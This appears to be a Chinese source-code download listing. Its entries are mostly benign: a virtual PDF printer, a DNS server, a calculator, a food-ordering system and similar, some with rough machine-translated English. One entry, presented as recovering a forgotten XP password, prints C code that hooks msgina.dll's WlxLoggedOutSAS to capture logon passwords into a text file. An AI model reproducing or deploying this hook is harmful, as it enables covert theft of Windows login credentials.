-
Windows, right
视窗、右驾游各不相同
- 2022-07-03 21:16:38下载
- 积分:1
-
这个东西是模拟打印机,可以直接打印到pdf文件里面。除了平常需要外,当你测试打印程序却没有打印机时,这个东西用处很大。...
这个东西是模拟打印机,可以直接打印到pdf文件里面。除了平常需要外,当你测试打印程序却没有打印机时,这个东西用处很大。-this thing is simulated printer can print directly to the pdf file inside. In addition to the normal needs, when you test procedures did not print printers, this thing very useful.
- 2023-01-17 17:10:04下载
- 积分:1
-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1
-
调整鼠标速度的源代码
调节鼠标速度的源代码
- 2022-05-29 13:25:15下载
- 积分:1
-
虚拟打印机
virtual printer
- 2023-06-19 03:50:03下载
- 积分:1
-
Windows和Unix下可以DNS服务器的源代码编译
windows/unix下都可以编译的DNS SERVER的源代码-windows/unix can be compiled under the DNS Server source code
- 2022-08-20 00:43:08下载
- 积分:1
-
一个漂亮的带优先级的简单计算器
一个漂亮的带优先级的简单计算器-a beautiful priority with a simple calculator
- 2022-09-13 13:25:03下载
- 积分:1
-
网上订餐系统
本次设计的网上订餐系统主要实现功能:有一个用户端,有一个后台。用户端可以对菜品进行浏览,添加到购物车里查看他的配方,价钱等等。后台主要实现菜品的添加,修改(价格,配方图片等),以及配送人员的分配。是否送到等。
- 2022-10-09 08:55:18下载
- 积分:1
-
随机生成链表,并按大小排序,链表的插入删除以及查找工作...
随机生成链表,并按大小排序,链表的插入删除以及查找工作-Randomly generated list, and the size of order, delete and insert the list of job search
- 2022-01-28 06:05:35下载
- 积分:1
-
SMART PHONE 2005 on the addition to the corresponding directory of contacts Phot...
SMART PHONE 2005中关于给电话簿添加相应联系人图片的使用例子源码,可以使用此代码,给相应的联系人添加大头贴等,需用VS2005BETA2进行编译。-SMART PHONE 2005 on the addition to the corresponding directory of contacts Photo source usage example, can use this code to the appropriate contacts to add still photos, required VS2005BETA2 computer.
- 2023-07-25 18:00:03下载
- 积分:1